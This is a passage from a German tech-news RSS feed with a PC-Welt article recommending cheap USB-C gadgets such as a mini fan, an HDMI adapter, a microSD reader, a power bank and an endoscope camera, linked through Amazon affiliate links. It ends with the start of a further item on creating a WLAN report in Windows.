<p>Der <a href="https://www.amazon.de/KIMMOO-Tragbarer-1-Turbo-Ventilator-USB-wiederaufladbarer-Mini-Handventilator/dp/B0DRNQKTH9?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Mini-Ventilator für unter 20 Euro</a> mit USB-C-Ladeanschluss kann ganz einfach über <a href="https://www.pcwelt.de/article/1167895/vergleich-die-besten-powerbanks-im-test-4500-bis-30000-mah.html" target="_blank" rel="noreferrer noopener">Powerbanks</a>, Computer, Laptops oder USB-Ladegeräte betrieben werden. Es gibt aber noch kleinere und günstigere <a href="https://www.amazon.de/Mini-Handy-Fan-Handy-Fan-Taschen-Fan-Reise-Ventilatoren-Smartphone-Tablet-Typ-C-Schnitts-Wei%C3%9F/dp/B0BVMZBVD6/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Ventilatoren</a>, die man direkt ans Handy anschließen kann, und gerade mal 2-3 Euro pro Stück kosten. Diese sorgen aber auch für einen weniger starken Luftstrom, daher würden wir eher die erste Variante empfehlen.</p>



<h2 class="wp-block-heading">USB-C zu HDMI Adapter</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b7f001"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/09/Anker-USBC-to-HDMI-adapter.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Anker USB-C to HDMI adapter" class="wp-image-2905503" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Anker</p></div>



<p>Wenn Ihr Laptop über einen USB-C-Anschluss verfügt, Sie Ihren Monitor aber schon seit Ewigkeiten nicht mehr geupgradet haben, verfügt Ihr Bildschirm vermutlich nicht über einen Typ-C-Anschluss. Dieser <a href="https://www.amazon.de/dp/B07THJGZ9Z?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Adapter von Anker</a> löst dieses Problem für Sie, sodass Sie das normale HDMI-Kabel, das Sie an Ihren Monitor anschließen, mit diesem Gerät verbinden können.</p>



<p>Der Adapter unterstützt Auflösungen von bis zu 4K bei 60 Hz, was ziemlich beeindruckend ist. Dies ist auch eine raffinierte Möglichkeit, Ihr Smartphone oder Tablet an Ihren Monitor oder Fernseher anzuschließen. Das Gerät kostet circa 13 Euro, aber wir haben es schon für nur 13 Euro bei Amazon gesehen.</p>



<h2 class="wp-block-heading">Mini-Schraubendreher</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b80071"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/07/image_41cdff.png?w=1200" alt="USB C Mini Schraubendreher" class="wp-image-2906096" width="1200" height="1126" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Amazon</p></div>



<p>Wenn Sie häufig an Ihrem Computer oder anderen Geräten herumschrauben müssen, ist dieser <a href="https://www.amazon.de/Mini-Elektrisch-Schraubendreher-Set-Screwdriver/dp/B0D47CS4TD/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">elektrische Mini-Schraubendreher</a> vielleicht genau das Richtige für Sie. Dieser stiftförmige Schraubendreher verfügt über vier LED-Leuchten, damit Sie besser sehen können, woran Sie gerade arbeiten, und dreht sich 200 Mal pro Minute, sodass Sie die Arbeit schneller erledigen können.</p>



<p>Der Schraubendreher verfügt über 64 verschiedene Aufsätze, es sollte also für so gut wie jeden Einsatzzweck ein passender dabei sein. Er kann über USB-C aufgeladen werden und hält bis zu drei Stunden lang. Der Elektroschraubendreher kostet normalerweise 41 Euro, ist aber auch für 32 Euro im Angebot erhältlich.</p>



<h2 class="wp-block-heading">USB-C microSD-Kartenleser</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b80af6"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/05/image_491207.png" alt="USB C microSD Kartenleser Ugreen" class="wp-image-2858705" width="1135" height="1009" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Ugreen / Amazon</p></div>



<p>Die meisten Laptops verfügen heutzutage nicht mehr über einen Kartenleser, daher muss man andere Wege finden, um Daten von diesen kleinen Dingern zu übertragen. Egal, ob Sie Daten von der Karte Ihrer Dashcam oder Ihrer Kamera übertragen möchten, dieser winzige <a href="https://www.amazon.de/UGREEN-Kartenleser-Aluminium-Kartenleseger%C3%A4t-kompatibel/dp/B08CS8T8DC/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Ugreen USB-C microSD-Kartenleser</a> ist dafür bestens geeignet.</p>



<p>Der Kartenleser ist so klein, dass Sie ihn wahrscheinlich an einem Schlüsselbund befestigen können. Wenn Sie eine etwas vielseitigere Version bevorzugen, bietet <a href="https://www.amazon.de/dp/B07D1J88CF?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Ugreen ein Modell an, das auch mit SD-Karten kompatibel ist</a> und sowohl über USB-C- als auch USB-A-Anschlüsse verfügt. Alle diese Modelle kosten weniger als 10 Euro und sind daher eine lohnende Investition.</p>



<h2 class="wp-block-heading">Anker Nano Power Bank</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b818ab"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/03/Anker-Nano-Powerbank-5000mAh.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Anker Nano Powerbank, 5000mAh" class="wp-image-2640989" width="1200" height="1200" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Anker </p></div>



<p>Eine Sache, die Sie unbedingt in Ihrer Tasche, Reisetasche oder in Ihrem Rucksack haben müssen, ist eine <a href="https://www.pcwelt.de/article/1167895/vergleich-die-besten-powerbanks-im-test-4500-bis-30000-mah.html" target="_blank" rel="noreferrer noopener">Powerbank</a>. Denn man weiß schließlich nie, wann das Telefon einen mal im Stich lässt und nach einer Aufladung schreit. Die <a href="https://www.amazon.de/Anker-Powerbank-Integrierter-Faltbarer-Kompatibel/dp/B0C6XK77HJ/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Anker Nano Power Bank</a> ist zum Glück so klein, dass sie fast überall hinpasst.</p>



<p>Sie verfügt über einen faltbaren USB-C-Anschluss und einen Anschluss an der Seite, sodass Sie bei Bedarf zwei Geräte gleichzeitig aufladen können. Die Kapazität von 5.000 mAh reicht gerade aus, um Ihr Handy einmal vollständig aufzuladen, was in der Not entscheidend sein kann. Außerdem kostet sie gerade mal 26 Euro, ist aber immer wieder mal reduziert.</p>



<h2 class="wp-block-heading">Endoskopkamera mit Licht</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b825b1"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/05/Endoscope-Camera-with-Light.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Ennovor Endoscope camera " class="wp-image-2779926" width="1200" height="750" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Ennovor</p></div>



<p>Auch wenn Sie diese <a href="https://www.amazon.de/Endoskopkamera-Ennovor-Wasserdicht-Inspektionskamera-Rohrkamera/dp/B0DFM6RFHR/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Endoskopkamera von Ennovor</a> nicht jeden Tag benutzen werden, kann sie doch sehr nützlich sein. Sie schließen sie einfach an Ihr Telefon an, installieren eine App und sehen alles, was Ihre Kamera macht. <a href="https://www.pcwelt.de/article/2771668/dieses-geniale-tool-kostet-weniger-als-19-euro-und-erleichtert-mir-jede-woche-das-leben.html" target="_blank" rel="noreferrer noopener">Mein Kollege schwört darauf</a> und verwendet sie, um alles zu finden, was so hinter dem Schreibtisch verloren geht.</p>



<p>Gerade dann, wenn Sie am Auto arbeiten oder nach undichten Leitungen suchen, ist das Teil super nützlich. Da sie die Schutzklasse IP67 hat, können Sie sie sogar in Ihr Aquarium stellen. Die Kamera wird mit einem circa 5 Meter langen, halbstarren Kabel und diversem Zubehör geliefert, darunter ein Haken, ein Magnet und ein Spiegel. Sie können diese Kamera im Moment für um die 22 Euro kaufen.</p>



<h2 class="wp-block-heading">Blukar Taschenlampe</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b8336b"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/05/Blukar-flash-light.jpg?quality=50&amp;strip=all" alt="Blukar rechargeable flashlight" class="wp-image-2779875" width="1045" height="653" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Blukar</p></div>



<p>Egal, wer Sie sind oder wo Sie so unterwegs sind: Sie brauchen eine Taschenlampe. Je kleiner, desto besser, denn so können Sie sie in jede Tasche stecken. <a href="https://www.amazon.de/Blukar-Taschenlampe-Superhelle-Betriebsdauer-Wasserdichte/dp/B0B42R2GKP/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Dieses Modell von Blukar</a> verfügt über einen eingebauten 1800mAh-Akku, den Sie mit einem der vielen Typ-C-Kabel aufladen, die Sie so herumliegen haben.</p>



<p>Mit einer einzigen Ladung können Sie bis zu 16 Stunden arbeiten, was ziemlich gut ist. Sie können zwischen vier verschiedenen Blitzmodi wählen, darunter auch einer, der Ihnen hilft, Hilfe zu signalisieren. Außerdem kostet die kleine Taschenlampe weniger als 10 Euro. Es gibt also keine Ausrede, sich diesen Tipp entgehen zu lassen.</p>



<h2 class="wp-block-heading">Samsung Flash-Laufwerk</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b83f55"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/08/Samsung-USB-Type-C-flash-drive-product-promo.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Samsung USB Type-C flash drive product promo" class="wp-image-2441089" width="1200" height="800" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Samsung</p></div>



<p>Die allermeisten Flash-Laufwerke haben einen USB-A-Anschluss, aber <a href="https://www.amazon.de/Samsung-Type-CTM-Flash-MUF-256DA-APC/dp/B09R2CF1K2/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">dieses von Samsung</a> besitzt einen Typ-C-Anschluss. Mit Übertragungsgeschwindigkeiten von bis zu 400 MB/s können Sie Dateien im Handumdrehen verschieben. Das Coole an diesem USB-Stick ist, dass Sie ihn sogar in Ihr Smartphone stecken können, um 4K-Videos direkt darauf aufzunehmen.</p>



<p>Das Samsung Type-C Flash-Laufwerk ist in verschiedenen Speicheroptionen erhältlich, angefangen bei 64 GB bis hin zu 512 GB.</p>



<h2 class="wp-block-heading">Mini Luftpumpe</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b84b10"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/06/PC-Welt-Aufmacher-60.jpg?quality=50&amp;strip=all" alt="CYCPLUS Luftpumpe I50PSI Elektrischer Kompressor Tragbar Fahrradpumpe Mini Reifenpumpe mit Digital LED Anzeige LED Licht Wiederaufladbarer Li-ionen 12V für alle Fahrräder Motorräder und Autos Amazon Angebot" class="wp-image-2377338" width="1200" height="800" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PCWelt/Cycplus/Amazon</p></div>



<p>Ebenfalls perfekt für den Sommer geeignet ist diese <a href="https://www.amazon.de/dp/B08QMJSHDG?th=1&amp;tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">kleine Luftpumpe von Cycplus</a>, die unterwegs in jede Tasche passt. Sie kann nicht nur einen Fahrradreifen innerhalb von zwei Minuten auf Knopfdruck wieder aufpumpen, sondern wird auch per USB aufgeladen. Sie eignet sich laut Hersteller für Mountainbikes, Rennräder, Motorräder und sogar Autos!</p>



<p>Neben der Luftpumpe selbst lässt sich dieses praktische Gadget auch als Taschenlampe oder Powerbank für unterwegs einsetzen. Alles Dinge, die man auf einer Fahrradtour sehr gut gebrauchen kann. Und für den Preis von nur 45,99 Euro wirklich empfehlenswert, wenn Sie schnelle Hilfe bei platten Reifen benötigen. Im Angebot kostet sie sogar nur 37 Euro.</p>



<h2 class="wp-block-heading">Leselampe mit Buchklemme</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b85712"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/05/image_92cd0c.png?w=1200" alt="" class="wp-image-2796038" width="1200" height="1200" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Gritin / Amazon</p></div>



<p>Wer auch gerne und viel liest, und das teilweise bis spät in die Nacht hinein, wird sich über dieses kleine Teil hier freuen: eine Leselampe, die Sie einfach an Ihr Buch klemmen können. Das ist jetzt vielleicht nichts bahnbrechend Neues, doch mit insgesamt drei Farbtemperaturen und fünf verschiedenen Lichtmodi können Sie individuell anpassen, wie viel Licht Sie zum Lesen brauchen. </p>



<p>Die <a href="https://www.amazon.de/Gritin-Farbtemperatur-Helligkeit-Wiederaufladbare-Klemmlampe/dp/B0CBPL4RKH?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Leselampe von Gritin</a> kostet bei Amazon gerade mal 13 Euro und besitzt einen 1200-mAh-Akku, der je nach Nutzung bis zu 80 Stunden durchhält. Danach können Sie ihn einfach per USB wieder aufladen. Den Hals der Lampe können Sie nach Belieben hin- und herschwenken, und es gibt sogar eine kleine Ladeanzeige. Was will man mehr?</p>



<h2 class="wp-block-heading">Externes DVD-Laufwerk</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b86613"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/07/Amicool-external-CD-DVD-drive-deal.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Amicool external CD DVD drive deal" class="wp-image-2864860" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Amicool</p></div>



<p>Wenn Ihr Laptop wie viele heutzutage kein DVD-Laufwerk besitzt, dann wird Ihnen dieses kleine Gerät sehr nützlich sein. Dieses <a href="https://www.amazon.de/dp/B07V67STBD?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">externe DVD-Laufwerk von Amicool </a>wird über USB-C (oder USB-A) an Ihren Laptop angeschlossen und bietet Ihnen das optische Laufwerk, das Sie manchmal benötigen.</p>



<p>Es kann DVDs und CDs problemlos lesen und brennen, sodass Sie Software installieren, Dateien kopieren, Daten sichern, Spiele spielen und vieles mehr können. Sie müssen nicht einmal Treiber installieren, da dieses Gerät Plug-and-Play-fähig ist. Normalerweise kostet es 28 Euro, aber oft ist es schon für etwa 20 Euro zu haben, was ein absolutes Schnäppchen ist.</p>



<h2 class="wp-block-heading">Wiederaufladbare Handwärmer</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b87298"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Handwarmer_USBC_Gadget.jpg?quality=50&amp;strip=all" alt="Handwärmer USB Gadget" class="wp-image-3198531" width="1097" height="930" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Amazon / PC-WELT </p></div>



<p>Wenn es langsam wieder kälter wird, wünscht man sich oft nichts sehnlicher, als seine Hände etwas schneller aufwärmen zu können. Das geht natürlich auch mit Handschuhen oder einer Tasse Tee, doch <a href="https://www.amazon.de/Handw%C3%A4rmer-wiederaufladbar-elektrische-Taschenheizung-W%C3%A4rme-Therapie/dp/B0CJYBXMXH?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">diese Handwärmer für 20 Euro</a> sind nicht nur wiederaufladbar, sondern halten Ihre Finger mit einer einzigen Ladung auch bis zu 24 Stunden lang warm.</p>



<p>Die beiden Gadgets verfügen über einen Temperatursensor-Chip, mit dem Sie eine von drei Temperaturen für eine präzise Steuerung auswählen können. Außerdem stehen verschiedene Farben zur Auswahl, wodurch sie sich auch bestens als Geschenk eignen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[So erstellen und verstehen Sie den WLAN-Report in Windows]]></title>
<description><![CDATA[Können Geräte keine Verbindung zum WLAN herstellen oder läuft die Datenübertragung plötzlich lediglich noch im Schneckentempo, ist die Ursache oftmals schwer zu bestimmen. Der Fehler kann an veralteten oder beschädigten Treibern liegen, an einem überlasteten oder falsch konfigurierten Router, an ...]]></description>
<link>https://tsecurity.de/de/3690806/windows-tipps/so-erstellen-und-verstehen-sie-den-wlan-report-in-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690806/windows-tipps/so-erstellen-und-verstehen-sie-den-wlan-report-in-windows/</guid>
<pubDate>Fri, 24 Jul 2026 08:18:32 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



